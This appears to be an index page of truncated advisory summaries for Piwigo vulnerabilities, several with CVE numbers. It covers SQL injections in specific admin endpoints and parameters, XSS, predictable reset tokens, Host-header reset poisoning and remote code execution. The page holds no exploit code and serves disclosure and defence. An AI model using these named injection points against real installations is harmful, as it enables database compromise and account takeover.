📦 Piwigo

A reflected XSS vulnerability in Piwigo's admin interface allows attackers to inject malicious JavaScript via crafted URLs. Only authenticated administrators are affected when they visit malicious lin...

Piwigo 13.6.0 contains a SQL injection vulnerability in the /admin/permalinks.php endpoint that allows attackers to execute arbitrary SQL commands. This affects all Piwigo installations running versio...

This is a critical SQL injection vulnerability in Piwigo's cat_move.php file that allows attackers to execute arbitrary SQL commands via the 'selection' parameter when moving categories. Attackers can...

This vulnerability allows authenticated administrators in Piwigo 11.4.0 to perform SQL injection attacks via the order[0][dir] parameter in admin/user_list_backend.php. Attackers can potentially execu...

Piwigo versions 14.x have a weak secret key generation vulnerability during installation. Attackers can brute-force the secret key in about one hour, potentially bypassing CSRF protection and generati...

This vulnerability in Piwigo allows attackers to send password reset emails containing malicious links to legitimate users. By manipulating the Host header in HTTP requests, attackers can redirect use...

Piwigo photo gallery software versions before 13.8.0 contain a SQL injection vulnerability in the administrator login screen. Attackers with any administrator access can execute arbitrary SQL statemen...

CVE-2023-27233 is a SQL injection vulnerability in Piwigo's user_list_backend.php file that allows attackers to execute arbitrary SQL commands via the order[0][dir] parameter. This affects all Piwigo ...

This SQL injection vulnerability in Piwigo allows remote attackers to execute arbitrary SQL commands via the filter_user_id parameter in the admin.php endpoint. Attackers could potentially read, modif...

CVE-2022-32297 is a SQL injection vulnerability in Piwigo's search function that allows attackers to execute arbitrary SQL commands. This affects Piwigo v12.2.0 installations, potentially compromising...

CVE-2021-40553 is a remote code execution vulnerability in Piwigo's LocalFiles Editor that allows attackers to execute arbitrary code on affected systems. This affects Piwigo 11.5.0 installations with...

CVE-2021-40317 is a SQL injection vulnerability in Piwigo's admin.php file via the id parameter. This allows authenticated attackers to execute arbitrary SQL commands on the database. Only Piwigo admi...

This CVE describes an SQL injection vulnerability in Piwigo's admin/user_perm.php file via the cat_false parameter. Attackers can execute arbitrary SQL commands on the database, potentially compromisi...

Piwigo v12.2.0 contains an information disclosure vulnerability in the admin maintenance actions page. Attackers can exploit this to leak sensitive information from the application. Only Piwigo instal...

CVE-2016-3735 is a predictable password reset token vulnerability in Piwigo image gallery software. When certain criteria aren't met, Piwigo uses PHP's mt_rand() function to generate password reset to...

This SQL injection vulnerability in Piwigo allows attackers to execute arbitrary SQL commands via the language parameter in the admin.php?page=languages endpoint. It affects Piwigo installations befor...

A stored cross-site scripting (XSS) vulnerability in Piwigo's photo description field allows attackers to inject malicious scripts that execute when administrators view the affected page. This affects...

An authenticated cross-site scripting (XSS) vulnerability in Piwigo v14.5.0 allows attackers with album creation permissions to inject malicious scripts into album names. When other users view these a...